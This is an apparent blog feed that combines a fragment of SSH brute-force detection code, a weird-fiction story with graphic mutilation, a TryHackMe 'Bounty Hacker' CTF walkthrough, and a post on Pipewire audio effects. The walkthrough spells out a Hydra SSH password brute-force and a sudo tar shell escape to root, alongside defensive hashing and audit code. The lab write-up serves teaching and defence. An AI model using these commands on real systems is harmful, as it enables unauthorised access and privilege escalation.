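    + [_line(13, "Accepted password for jake from 10.10.14.2 port 40013 ssh2")]
    + [_line(s, "Failed password for invalid user admin from 10.10.33.9 port 51000 ssh2") for s in (20, 40)]
    + [_line(45, "pam_unix(sshd:session): session opened for user jake by (uid=0)")]
)

if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG):
        print(f"{a['ip']} -> {a['user']}: {a['failures']} failures since {a['first_seen']:%H:%M:%S},"
              f" login succeeded: {a['succeeded']}")
```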

 

from J. R. DePriest

'Sandalwood,' I think. 'I've never smelled it before, but I know that's what this is.'
'This body must know what it is.'

I shift my legs, feel the soft support of whatever I'm sitting on. Lean back and push my shoulders in, enjoying its exquisite construction, resting my arms on two sturdy, padded rests.

And I hear murmuring.

I open my eyes just a slit, just enough to take in the room while still relaxing.

It's dark in here. Nice.

I slide my gaze over the floor.

Rose patterned carpet. Wide, round room, like a private hotel room.

Small windows at the edges, almost like airplane windows.

I look up to see who's whispering.

The back of a couch, detailed in another fine rose pattern. I know each rose was hand-stitched.

On the left, my cousin, Anna Marie but with dark, red hair, leaning over and conspiring with her best friend, the brunette Shelby. In my reality, Shelby carried a child for Anna Marie who is barren. In this reality, Anna Marie is newly married to Prince Dove-Tree of the Great Plains Alliance, a gentrified Native American nation in the middle of what I would call The United States of America.

I look at myself.

My sleeves are of cream-colored linen interwoven with silk bands, alternating teal and primrose. My burgundy jacket hangs open revealing a stark white frilled blouse with black banding and a glittering undercurrent of swirling rainbows. I'm wearing black, leather pants with braided inlay and well-made but worn work boots.

I shift, squint, feel where I am.

'I'm in the women's car,' I think. 'But I'm not quite a woman, am I?'

I flex my hands. Long, dexterous fingers yet thick palms, like cement.

'For fighting,' I almost remember.

I think of fire and push with every muscle and nerve in my forearms.

Nothing.

I think of ice and with great effort my hands glisten but produce barely a hint of frost.

'Magick,' I think. 'But not strong, not elemental.'

I sink into my memories. 'Who am I? What is my role? What are my skills?'

'Ah,' I think, picking out an interesting tidbit.

I make a gesture with the first two fingers of both hands and it begins to rain blood inside the cabin.

Anna Marie sits up, looks around, grimaces, and stares daggers at me.

She audibly sighs, rolls her eyes, sits up straight and stands.

I see she's wearing a full-length, slinky velvet dress the same dark red as the rest of the rose motif. She smooths the skirt, straightens her sleeves, lifts her head and walks toward the front of the room.

She makes a right but is also still heading the same direction. She goes around a partition that folds the wrong way.

'Non-Euclidean design,' I think, nodding to myself.

The blood rain isn't real, of course. It's an illusion.

Nothing is getting wet.

I smile broadly, lift my chin, notice the hat on my head for the first time. Glancing up, I see a broad, dark rim, coming to a point about six inches out.

I remove it and hold it in my sturdy hands before leaning forward to engage with Shelby.

In my reality, Anna Marie was a “cousin” by association, part of our chosen family. I wish to determine our relation here and, if possible, find a way to woo her into my own good graces instead of this Prince.

It's a dream, after all; I can do whatever I want.

“It won't work, charlatan,” says a smooth, calm voice to my left.

“Pardon?” I say, hearing my own lustrous, lyrical voice for the first time.

I feel a gentle, but demanding hand on my left shoulder, urging me to rise and follow.

I steal a glance to see a broad, stunning blonde man in golden, padded armor, lined with silver and bearing the yellow crescent and pyramid seal of the Anglican Cheyenne House. Prince Donald Dove-Tree.

He hadn't been there the moment before. His appearance also ends my blood rain.

I am compelled to follow until we are standing at one of the portholes. I am thankful to have been given the option to come voluntarily.

I can see we are traveling down a paved road that is not nearly wide enough to accommodate a vehicle of this size and I wonder what shape was given to the outer appearance, I wonder what the people see.

Speaking of “the people”, they wear anachronisms mixed with modern, blue jeans and Ren Faire. The buildings are stone and glass, of two times, straddling an imagined past and a dirty, industrial present.

“I have three theories about what happens when I dream—,” I start to explain.

“This is the real world,” Prince Dove-Tree insists. “Those are real people, with real lives. They do not need your interference.”

He pushes me against the glass, forcing me to look.

Unabated, I continue, “As I was saying, when I borrow someone's body, I gain an intuitive but incomplete understanding of the world and my place in it.”

He spins me around, showing intense iron-blue eyes, uncomfortable in his baby round face lacking even stubble on his clenched jaw or full upper lip. “This is a complete world. You are not needed.”

I sense his frustration and annoyance.

“And when we swap back, they will remember everything I did. I understand that their subconscious mind will ret con the memories such that it finds a reason for everything that was done.”

I laugh.

“Although, sometimes I don't make it easy.”

He rubs his forehead with his free hand, closing his eyes and grinding his teeth.

He looks into my eyes and softens, smiles, even.

But he gets no chance to speak as we both wobble with the stoppage of our conveyance. I hadn't even truly noticed its motion.

“Come, then,” demands the Prince.

I don't remember stepping outside, but I am. I turn to look at the vehicle and it's a simple limousine. I'm not sure we were ever actually inside of it.

A black man in threadbare but clean worker's clothes greets us and leads us past the wide glass front of a restaurant. I see patrons seated at round tables eating and visiting.

I step toward the main door, but we are pulled and led to a simpler one, immediately to the right that I hadn't noticed.

Inside, we are in a hallway that wasn't visible from outside. The walls must be thick because I can't hear the restaurant.

I see other black men in formal dark blue uniforms, carrying perfectly vertical pike staves, standing at attention at regular intervals as we pass.

The hallway doesn't turn, but I notice I can't see that far behind us or very far in front of us.

Finally, there is another door to our left and a large black woman opens it from the other side and welcomes us enthusiastically.

I smell meat and spices, feel steam. Glancing inside is a kitchen fit for a castle with dozens of people, all black, working at chopping, slicing, spicing, preparing, and cooking in pots, ovens, and open flames.

Instead of entering the kitchen, we are led through another set of non-Euclidean hallways curving over and under until we are in the middle of what should be the restaurant and what should be the kitchen, until we enter an entirely liminal room, veiled in shadows and lacking walls or a visible ceiling.

Sitting at a conspicuous L-shaped table of carved marble is Jon, Anna Marie's brother and a Duke, slouching in heavy, dingy, deep red robes more appropriate for a king.

I know he's proud to have married his sister off to a Prince. I also know he's an idiot and his sister was the true master of this domain.

I estimate he will lose everything and be subsumed by the Great Plains Alliance in less than two years.

Speaking of the Prince, he quickly speeds to the Duke and they begin whispering back and forth.

Anna Marie and Shelby stay close to me, with Anna Marie gently touching my elbow as if to let me know she's there. I am supposed to be their protector. I didn't realize that until just now. I know them and typically call them my only true friends. I fight for them.

The Duke sits up, eyes suddenly bright and motions for two of the blue-clad, black-skinned sentries to come over.

They lean in for quiet orders while he gestures toward me.

The two men look at me, then back to the Duke and he nods then waves them away.

All the servants are black, I realize. All of them. And I haven't seen a single citizen on the street or in the restaurant out front that was black.

I think—I remember there was no Revolutionary War here and also no Civil War. That would explain the titles and pageantry, too.

History is not this version of me's strong suit. It's not mine, either.

One of the men asks Anna Marie and Shelby, “I'm very sorry Your Highness and Missus, but would you please step back from The Attendant?”

They step back as the two men flank me, The Attendant, apparently.

“Sorry, Mx,” one of them tells me as they push me toward the Duke. They don't prod me with their pikes, but I know they would if I didn't do as they asked, as The Duke asked.

I do not resist, focusing on the non-binary honorific they used to address me. This one is considered neither man nor woman, but an official third thing.

Jon barely looks up once I'm standing over him.

“I thought you were better than this, Jesse,” he tells me. “I didn't even think you liked girls or boys in that way.
“The Prince informs me that you attempted to seduce my sister or rather that you planned to do so.”

'Shit,' I think. I completely forgot Prince Dove-Tree is a strong empath, nearly telepathic. The body I'm borrowing is typically far more clever than I've been.

Shit.

“Your punishment will be immediate.”

He gestures and the guard on my right takes my wrist and moves it to the table.

I understand and flatten my hand in front of the Duke.

“No need to hold me down,” I say.

The sentry doesn't let go.

The Duke produces a cleaver and seems to ponder something but thinks better of it.

“Three,” he says.

He positions the cleaver over the pointer finger of my right hand, leveling the blade just above the knuckle. He applies a tiny bit of pressure with his left hand steadying the blade before slamming his right hand down. A jolt of electrical fire shoots up my arm, my legs start to buckle, my vision blurs, my head swims, and my teeth grit almost to the point of breaking.

I hear a muffled scream and recognize it as Anna Marie.

“That's one,” the Duke says, lining up my middle finger.

The first cut left a spray of blood on the table and wall, but it's already stopped.

'I heal fast.' I know that. I knew that. But it still hurts.

He slams down his right hand and I feel the world spin around me, my insides flip, I bite my tongue nearly in two and feel my magick unspiraling itself, ready to retaliate. I have to push past the torture and will it back down.

“Two down,” he says, getting ready to cut off my ring finger.

SLAM!

Another scream, this time it's me. It takes every ounce of willpower and strength to not piss myself in pain and paint the entire room in illusory fire while sending a blast wave strong enough to flatten every living thing.

“Three,” he says, nodding. “Now, all is forgiven.”

He rolls one of the fingers thoughtlessly before waving them away. A servant quickly scoops up the bulk of the gore.

“Now let's eat.”

He doesn't even have the blood cleaned from the white marble.

He never looks up at me. Never meets my eyes.

My hand throbs, my entire arm numb as a jellyfish sting. My stomach roils and my head threatens to send me to the ground as my vision narrows and blackens.

I'm gingerly led to a side table where I sit alone, watching my fingers knit themselves back together. I'll have a complete—albeit gnarly—set in a few hours and be fully functional by tomorrow morning.

Behind me, I hear Anna Marie crying softly to Shelby.

The shock and pain pushed me deeper into the memories of this body. For example, I know Anna Marie and I are already having an affair. The person I'm borrowing is just a far better “charlatan” than I.

I turn slightly to survey the feast of a Duke.

For all the savory smells from the kitchen, they are eating simple sandwiches of grilled, exotic meats and cheeses. The Duke doesn't care for fancy dishes, as I now recall.

I see a group of people, dressed as peasants, lumbering toward the Duke out of the distant dimness. There aren't any doors so I'm not sure where they are coming from.

They are shuffling zombie-like and there are more of them than I initially thought. I count eighteen so far and hear the scrape and slide of others still hidden.

The Duke notices and sends a half dozen of his sentries with a careless gesture while continuing to eat.

They rush ahead, confronting the crowd but are completely ignored. The few they stop offer no resistance, staring blankly while the bulk keeps coming, pushing past them, stumbling steadily forward.

“Enjoy the food?” a sonorous, sinister voice asks, as a thin man, dressed in a white robe fluttering in a non-existent breeze, with dark black hair appears from the larger group.

“Malcolm!” growls the Duke.

I see him move to stand, but nothing happens. He leans forward, he leans sideways, he pushes his arms down, but he can't get up, can hardly move at all.

None of them can. Not the Prince, not Anna Marie or Shelby.

I stand and stride forward.

Malcolm sees me coming and gestures with his right hand sending a snaking bolt of lightning at me.

Grinning wildly, I slap it out of the air with my left hand like an annoying gnat.

I love this part of the job.

Malcolm starts a more complex gesture, but I'm already on him, lifting him into the air with what remains of my right hand, squeezing his neck between the claw of my pinky and thumb so he can barely swallow, let alone speak. I grab his gesturing right hand and crush the bones as if they were balsa wood with my left.

“Not hungry today, eh Jesse?” he croaks.

I see Prince Dove-Tree struggling to form a sign with his hands as Malcolm is slowly enveloped by a yellow glow, further incapacitating him.

I'm not the empath that he is, but the satisfaction I feel from the Prince is uncharacteristic and overzealous.

This was his plan. The Prince. Malcolm. Perhaps even Anna Marie.

The Duke will not survive the night, I fear.

My mind races, searching for solutions.

In fact—I realize as the mesmerized people continue closing in, glazed and moaning—I know he won't survive the night.


#WhenIDream #WritersOfMastodon #Writer #Writing #WeirdFiction

from plutogazer writeups

This is a walkthrough for the Bounty Hacker Capture The Flag room on TryHackMe. The writeup is meant to offer short, concise solutions under each “Task N” heading, while also offering an extended explanation in subheadings for those interested in finding out more about the solution to a specific task.


Task 1: Deploy the Machine

  1. Click the “Start Machine” button.

Task 2: Find Open Ports on the Machine

Let's use the network scanning tool nmap for this.

  1. nmap -sV MACHINE_IP

We find three services: FTP, SSH, and a Web Server.

2.1: Scanning the web server

I wanted to see if there was something of interest on the web server.

The index only shows a screencap and some text from the Sunrise's Cowboy Bebop show (it is a Cowboy Bebop-themed Room, after all), but nothing else. I tried enumerating the website's directories with gobuster to see if there was something of interest, but there was nothing out of the ordinary.

Task 3: Who wrote the task list?

There is no mention of a task list anywhere at first sight, but there is apparently an open FTP server.

  1. Access the FTP server by running ftp MACHINE_IP

We can only log in with an anonymous user, so the next step is:

  1. Connect to the FTP server and input “anonymous” as the username.

  2. List the contents of the current directory with the dir FTP command.

We see two files, including the task.txt file. Let us download them to our machine.

  1. Download both files by using the get FTP command. get task.txt and the same for locks.txt, just in case we need it in the future.

  2. Read the contents of the downloaded files. They are saved in the directory the terminal was in when we started the FTP session. We can just click on them or use the cat command: cat task.txt

Solution: The author of the task list is

lin

3.1 The locks.txt file

To satisfy our curiosity, let's check what the locks.txt file contained:

cat locks.txt

If you looked at it, then you know: it can be assumed that we are looking at a list of passwords (in plaintext!). Another way of saying this is that we found a wordlist.
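As an added example (not part of this writeup, and not the room's locks.txt), here is what such a credential store should look like instead of a plaintext list: each password is replaced by a salted PBKDF2-HMAC-SHA256 record, and checks are done with a constant-time comparison so the stored file is useless as a wordlist. The sample entries and the record format pbkdf2_sha256$iterations$salt$hash are constructed for this example.

```python
"""Keep a credential list as salted hashes instead of plaintext.

Added example, not from the writeup.  The entries below are constructed and
are not the room's locks.txt.  PBKDF2-HMAC-SHA256 is used because hashlib
ships it everywhere; the iteration count is a parameter so it can be raised
for the hardware it actually runs on.
"""
import hashlib
import hmac
import secrets

DEFAULT_ITERATIONS = 600_000  # OWASP's current guidance for PBKDF2-HMAC-SHA256

# Constructed stand-in for a plaintext "label:password" list (not the room's file).
SAMPLE_PLAINTEXT = [
    "# constructed sample, not the room's locks.txt",
    "router:ExampleOnly-1",
    "backup:ExampleOnly-2",
]


def hash_password(password, iterations=DEFAULT_ITERATIONS):
    """Return a self-describing record: pbkdf2_sha256$iterations$salt_hex$hash_hex.
    A fresh 16-byte random salt means equal passwords give different records."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, record):
    """Recompute the hash with the stored salt and compare in constant time.
    Malformed or foreign records simply fail verification."""
    try:
        algo, iterations, salt_hex, hash_hex = record.split("$")
        if algo != "pbkdf2_sha256":
            return False
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(hash_hex)
        iterations = int(iterations)
    except ValueError:
        return False
    actual = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(actual, expected)


def convert_plaintext_list(lines, iterations=DEFAULT_ITERATIONS):
    """Turn 'label:password' lines into 'label:record' lines; comments and blank
    lines are dropped, and no plaintext password survives in the output."""
    out = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        label, _, password = line.partition(":")
        out.append(f"{label}:{hash_password(password, iterations)}")
    return out


if __name__ == "__main__":
    for entry in convert_plaintext_list(SAMPLE_PLAINTEXT):
        print(entry)
```

The record carries its own parameters, so the iteration count can be raised later without invalidating existing entries: verify against the stored count, then rehash with the new one on the next successful login.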

Task 4: What service can you bruteforce with the text file found?

This refers to the locks file, which we examined in the previous task. Knowing the open ports and knowing the contents of locks.txt:

Solution: The service we can bruteforce is

SSH

Task 5: What is the users password?

There are several ways to brute-force an SSH password. We will use the Hydra tool in this instance.

  1. Brute-force lin's SSH password with Hydra:

    hydra -l lin -P /path/to/locks.txt MACHINE_IP ssh

    Be sure to change the path to locks.txt to the corresponding one on your machine.

The wordlist is quite short, so it won't take long until it finds lin's current password.

We now have access to the target machine.

Task 6: user.txt

  1. Connect to the target machine with lin's user and password (obtained on the previous step):

    ssh lin@MACHINE_IP
    
  2. Use the ls command to list the contents of lin's Desktop directory

We will find a user.txt file. Read it with cat and you will find the flag.

Task 7: root.txt

We can't change to /root/ because lin does not have the permissions to do so.

  1. Check what commands lin can run as root. There is more than one way to do this; the simplest one is:

    sudo -l -l
    

    It will ask us to input lin's password (which we know). It seems that lin can run /bin/tar as the root user.

  2. Find a way to escalate privileges using tar. GTFObins is a good source for this. I used the following command:

    sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
    

    This allowed me to run a shell as the root user.

  3. Change your directory to /root/ and list the contents. We will find the root.txt file, which contains the final flag.

Congratulations! The room is finished.

7.1 GTFOBins

If you want to investigate a bit more: when a /bin/ file appears in the output of the first command, look for the “Sudo” section of its specific GTFOBins entry. More generally, GTFOBins is a collection of commands that can be used to escalate privileges, transfer files, and break out of restricted shells, among other things.


How it could have been avoided

There were several vulnerabilities we took advantage of in this machine. Let us list them and give one solution to each:

  – Do not have sensitive ports open, or filter them: it is better to open ports only when needed. Even better, have them filtered – if the FTP or SSH port only allowed trusted IP addresses to connect to it, we would not have been able to use it like we did.

  – Do not allow anonymous connections to FTP servers, especially if the machine contains sensitive files and the port is open: this is how we exfiltrated the file containing lin's password.

  – Do not store passwords in plaintext: this is CRUCIAL! lin had stored the passwords in plaintext. No matter how strong they were, thanks to this, we were able to use them as a wordlist and connect to the FTP and SSH servers. Only store passwords in a secure hash format, and salted.

  – Do not allow unprivileged users to run files as root: this misconfiguration is how we escalated privileges. If something absolutely needs to be executed by unprivileged users with elevated privileges, add a policy to the /etc/sudoers.d/ directory, so that at least, in case of an incident, the user who executed a malicious command will be logged, instead of being logged as “root.”
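Two of the fixes above are plain configuration, and they can be checked for. As an added example (not the writeup's code, and not a tool from the room), here is a small Python audit that reads a vsftpd.conf and a sudoers file and flags the two settings this box fell to: anonymous FTP logins, and a sudo rule that gives an unprivileged user a binary with a documented GTFOBins shell escape. The sample configuration text inside it is constructed, and the SHELL_ESCAPE_BINS set is an illustrative subset I chose; extend it from GTFOBins for real use.

```python
"""Audit for two of the misconfigurations exploited in this room.

Added example, not part of the walkthrough.  It parses a vsftpd.conf and a
sudoers file (the sample text below is constructed, not taken from the room)
and reports anonymous FTP logins and sudo rules that let an unprivileged user
run, as root, a binary with a documented shell escape.
"""
import re

# Illustrative subset of binaries whose GTFOBins "Sudo" entries show a shell
# escape.  Assumption: this set is ours; extend it from GTFOBins for real use.
SHELL_ESCAPE_BINS = {
    "tar", "vim", "vi", "find", "less", "more", "awk",
    "python", "python3", "perl", "env", "bash", "sh",
}

# Constructed samples that mirror the weak settings the writeup describes.
SAMPLE_VSFTPD = """\
# constructed /etc/vsftpd.conf
listen=YES
local_enable=YES
anonymous_enable=YES
"""

SAMPLE_SUDOERS = """\
# constructed /etc/sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
ops     ALL=(root) /usr/bin/id
lin     ALL=(root) /bin/tar
"""

# user host=(runas) [TAG:] command, command ...
SUDO_RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
SKIP_PREFIXES = ("#", "@", "Defaults", "User_Alias", "Host_Alias",
                 "Cmnd_Alias", "Runas_Alias")


def parse_vsftpd(text):
    """Return {key: value} for key=value lines, skipping comments and blanks."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        cfg[key.strip().lower()] = value.strip()
    return cfg


def anonymous_ftp_enabled(cfg):
    """vsftpd.conf(5) documents the built-in default of anonymous_enable as
    YES, so a missing key counts as enabled."""
    return cfg.get("anonymous_enable", "YES").upper() == "YES"


def parse_sudoers(text):
    """Return [(user, runas, tags, commands)] for user-specification lines;
    Defaults, aliases, comments and include directives are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SUDO_RULE.match(line)
        if not m:
            continue
        tags, cmds = [], []
        for entry in m.group("rest").split(","):
            entry = entry.strip()
            # peel off leading tags such as NOPASSWD: or NOEXEC:
            while ":" in entry and entry.split(":", 1)[0].isupper():
                tag, entry = entry.split(":", 1)
                tags.append(tag)
                entry = entry.strip()
            if entry:
                cmds.append(entry)
        runas = (m.group("runas") or "root").strip()  # no (runas) means root
        rules.append((m.group("user"), runas, tags, cmds))
    return rules


def dangerous_sudo_rules(rules):
    """Flag rules granting a non-root user root via ALL or a shell-escape binary."""
    findings = []
    for user, runas, tags, cmds in rules:
        if user == "root" or not runas.upper().startswith(("ROOT", "ALL")):
            continue
        suffix = " without a password" if "NOPASSWD" in tags else ""
        for cmd in cmds:
            binary = cmd.split()[0].rsplit("/", 1)[-1]  # basename, args dropped
            if cmd == "ALL":
                findings.append(f"sudoers: {user} may run any command as root{suffix}")
            elif binary in SHELL_ESCAPE_BINS:
                findings.append(f"sudoers: {user} may run {cmd} as root{suffix}; "
                                f"{binary} has a documented shell escape")
    return findings


def audit(vsftpd_text, sudoers_text):
    """Combine both checks into a list of human-readable findings."""
    findings = []
    if anonymous_ftp_enabled(parse_vsftpd(vsftpd_text)):
        findings.append("vsftpd: anonymous logins enabled (set anonymous_enable=NO)")
    findings.extend(dangerous_sudo_rules(parse_sudoers(sudoers_text)))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_VSFTPD, SAMPLE_SUDOERS):
        print("FINDING:", finding)
```

To run it against a real host, read /etc/vsftpd.conf and the root-readable sudoers files (/etc/sudoers plus the fragments under /etc/sudoers.d/) into the two strings. The parser deliberately ignores aliases, so it complements rather than replaces `sudo -l` and `visudo -c`.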

 

from Bruno's ramblings

This assumes you're using Pipewire for your audio demands. Also, YMMV, depending on your hardware and on the codec and encoding parameters of your music files. Currently, 99% of the music I listen to is from Tidal, with the 16-bit and 44.1 kHz FLAC streaming option, and the configs at the bottom of this blog post are targeting this.

Without further ado, let's start with the tools ⚒️.

Easy Effects [1]

JamesDSP

I use some cheap stereo headphones (Esperanza EH240) that connect both via Bluetooth and a 3.5mm audio cable to my laptop. The specs are not impressive by any stretch, but it was a good purchase for what it cost:

  • Frequency range: 20 – 20000 Hz
  • Sensitivity: 105 dB
  • Impedance: 32 Ω

With either of the above-listed applications, I can use some filters to give a bit more depth to the audio, making it a touch richer and less bland.

For several months, Easy Effects has been my tool of choice, with only two filters enabled for the output: the equalizer for the higher frequencies, and bass loudness for the lower frequencies. There's also an alternative to bass loudness named bass enhancer, but the former works best with my headphones, IMO.

The application also has a preset functionality, and I use it to switch between them, depending on the music genre I'm listening to.

It needs to be noted that preset switching and management must be done inside the app; you can't do it from the system tray icon. It would at least be nice to have the three most recently used profiles there; any more and the menu would be too tall, even at FullHD resolution.

Here's my current config.

[Screenshot: Equalizer config – in pt-PT]

[Screenshot: Bass loudness config – in pt-PT]

Back when I used JamesDSP, the configs were somewhat similar. It's a different application, and the differences are more than a few, but it's easy to achieve a similar result.

If you don't have experience with this, IMHO it's best to have a more conservative approach when playing around with filters, as it's easy for the audio to start clipping (think of it as distorting). Don't worry, though, because each filter has a reset button.

[1] There's an alternative for PulseAudio, by the same author, named Pulse Effects (https://flathub.org/en/apps/com.github.wwmm.pulseeffects).

#Linux #Pipewire #EasyEffects #JamesDSP #Audio